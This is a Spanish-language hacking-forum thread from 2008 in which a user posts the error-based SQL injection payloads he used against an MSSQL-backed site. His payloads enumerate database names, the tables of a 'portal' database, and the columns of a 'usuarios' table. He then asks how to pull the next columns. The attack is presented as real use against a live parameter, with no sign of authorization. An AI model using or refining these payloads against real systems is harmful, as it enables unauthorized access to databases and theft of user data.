elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  duda sql inyeccion mssql
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda sql inyeccion mssql  (Leído 3,735 veces)
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
duda sql inyeccion mssql
« en: 6 Noviembre 2008, 00:10 am »

Bueno mi duda es la siguiente .. estuve realizando una inyeccion y pude sacar datos basicos ( como version,usuario,base de datos),ademàs de eso tambien saque todos los nombres de las bases de datos y de luego pude sacar todas las tablas de una sola base de datos en la cual tenia permisos el usuario.

hice lo siguiente:

asi para sacar las bases de datos:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 3 name FROM master..sysdatabases ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--
y cambiando el TOP mostraba las demàs

y asi las tablas:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 123 name FROM portal..SYSOBJECTS ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--

la pregunta es .. como puedo sacar las columnas de una tabla?

me refiero a no tener que sacar todas las columnas de todas las tablas si no de una en especial .. algo parecido a esto como en mysql:

from+information_schema.columns+WHERE+table_name = 'usuarios'--

como vemos en MySQL busca las columnas pero solo de esa tabla en especial.
En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: duda sql inyeccion mssql
« Respuesta #1 en: 6 Noviembre 2008, 05:50 am »

perdon .. pueden mover el tema?

ya he solucionado mi problema jugando un rato con las inyecciones .. y quedo algo asi:

?id=45 or 1 in (select name FROM portal..syscolumns where id = (SELECT id FROM portal..sysobjects WHERE name = 'usuarios'));--

al hacer esto me tiro "idUsuario"

ahora la nueva pregunta es ..

como saco la columna siguiente? hay algo parecido a limit de mysql? o como acomodo el top y demàs para que tire la segunda?

espero que puedan darme una mano .. saludos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Duda]Mssql inyection.
Nivel Web
volteo0101 8 3,777 Último mensaje 9 Enero 2011, 01:13 am
por volteo0101
MSSQL$MSSMLIBZ
Windows
skan 6 3,315 Último mensaje 28 Agosto 2014, 21:15 pm
por LuffyFF
ROMPER HASH MSSQL Y FTP
Hacking
THEGAME008 7 5,632 Último mensaje 17 Febrero 2021, 15:31 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines